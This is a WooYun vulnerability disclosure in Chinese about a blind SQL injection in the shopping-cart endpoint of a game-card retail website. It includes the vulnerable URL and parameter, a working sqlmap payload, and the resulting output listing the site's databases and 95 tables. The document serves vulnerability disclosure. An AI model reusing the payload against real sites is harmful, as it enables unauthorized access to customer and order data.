当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152249

漏洞标题:老友点卡网站主站存在SQL盲注

相关厂商:广州老友网络科技有限公司

漏洞作者: mango

提交时间:2015-11-06 10:42

修复时间:2015-12-21 10:44

公开时间:2015-12-21 10:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-06: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-12-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

~~~~~

详细说明:

http://www.laoyouka.com:80/flow.php?step=add_to_cart 
goods={goods_id:359,number:2,parent:0,quick:1,spec:[*],yijian:1}


post提交 spec:[*] 问题~

B0YOVEND[%R)LED]1D{6)9S.png

漏洞证明:

sqlmap identified the following injection points with a total of 42 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload:  goods={"goods_id":359,"number":2,"parent":0,"quick":1,"spec":["(SELECT (CASE WHEN (1874=1874) THEN 1874 ELSE 1874*(SELECT 1874 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))"],"yijian":1}
---
web application technology: PHP 5.2.17
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload:  goods={"goods_id":359,"number":2,"parent":0,"quick":1,"spec":["(SELECT (CASE WHEN (1874=1874) THEN 1874 ELSE 1874*(SELECT 1874 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))"],"yijian":1}
---
web application technology: PHP 5.2.17
back-end DBMS: MySQL 5.0
available databases [2]:
[*] information_schema
[*] laoyouka_lao
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload:  goods={"goods_id":359,"number":2,"parent":0,"quick":1,"spec":["(SELECT (CASE WHEN (1874=1874) THEN 1874 ELSE 1874*(SELECT 1874 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))"],"yijian":1}
---
web application technology: PHP 5.2.17
back-end DBMS: MySQL 5.0
Database: laoyouka_lao
[95 tables]
+-----------------------------------+
| oldfriendcard_account_log         |
| oldfriendcard_ad                  |
| oldfriendcard_ad_custom           |
| oldfriendcard_ad_position         |
| oldfriendcard_admin_action        |
| oldfriendcard_admin_jianyi        |
| oldfriendcard_admin_log           |
| oldfriendcard_admin_message       |
| oldfriendcard_admin_user          |
| oldfriendcard_adsense             |
| oldfriendcard_affiliate_log       |
| oldfriendcard_agency              |
| oldfriendcard_area_region         |
| oldfriendcard_article             |
| oldfriendcard_article_cat         |
| oldfriendcard_attribute           |
| oldfriendcard_auction_log         |
| oldfriendcard_auto_manage         |
| oldfriendcard_back_goods          |
| oldfriendcard_back_order          |
| oldfriendcard_black_list          |
| oldfriendcard_bonus_type          |
| oldfriendcard_booking_goods       |
| oldfriendcard_brand               |
| oldfriendcard_card                |
| oldfriendcard_cart                |
| oldfriendcard_cat_recommend       |
| oldfriendcard_category            |
| oldfriendcard_collect_goods       |
| oldfriendcard_comment             |
| oldfriendcard_crons               |
| oldfriendcard_delivery_goods      |
| oldfriendcard_delivery_order      |
| oldfriendcard_email_list          |
| oldfriendcard_email_sendlist      |
| oldfriendcard_error_log           |
| oldfriendcard_exchange_goods      |
| oldfriendcard_favourable_activity |
| oldfriendcard_feedback            |
| oldfriendcard_friend_link         |
| oldfriendcard_goods               |
| oldfriendcard_goods_activity      |
| oldfriendcard_goods_article       |
| oldfriendcard_goods_attr          |
| oldfriendcard_goods_cat           |
| oldfriendcard_goods_gallery       |
| oldfriendcard_goods_type          |
| oldfriendcard_group_goods         |
| oldfriendcard_kcard               |
| oldfriendcard_keywords            |
| oldfriendcard_link_goods          |
| oldfriendcard_mail_templates      |
| oldfriendcard_member_price        |
| oldfriendcard_nav                 |
| oldfriendcard_newmember           |
| oldfriendcard_order_action        |
| oldfriendcard_order_goods         |
| oldfriendcard_order_info          |
| oldfriendcard_order_ip            |
| oldfriendcard_pack                |
| oldfriendcard_package_goods       |
| oldfriendcard_pay_log             |
| oldfriendcard_payment             |
| oldfriendcard_plugins             |
| oldfriendcard_reg_extend_info     |
| oldfriendcard_reg_fields          |
| oldfriendcard_region              |
| oldfriendcard_role                |
| oldfriendcard_searchengine        |
| oldfriendcard_sessions            |
| oldfriendcard_sessions_data       |
| oldfriendcard_shipping            |
| oldfriendcard_shipping_area       |
| oldfriendcard_shop_config         |
| oldfriendcard_snatch_log          |
| oldfriendcard_stats               |
| oldfriendcard_suppliers           |
| oldfriendcard_tag                 |
| oldfriendcard_template            |
| oldfriendcard_topic               |
| oldfriendcard_user_account        |
| oldfriendcard_user_address        |
| oldfriendcard_user_bonus          |
| oldfriendcard_user_feed           |
| oldfriendcard_user_login          |
| oldfriendcard_user_new            |
| oldfriendcard_user_rank           |
| oldfriendcard_users               |
| oldfriendcard_virtual_card        |
| oldfriendcard_volume_price        |
| oldfriendcard_vote                |
| oldfriendcard_vote_log            |
| oldfriendcard_vote_option         |
| oldfriendcard_wholesale           |
| oldfriendcard_wubao               |
+-----------------------------------+

修复方案:

版权声明:转载请注明来源 mango@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝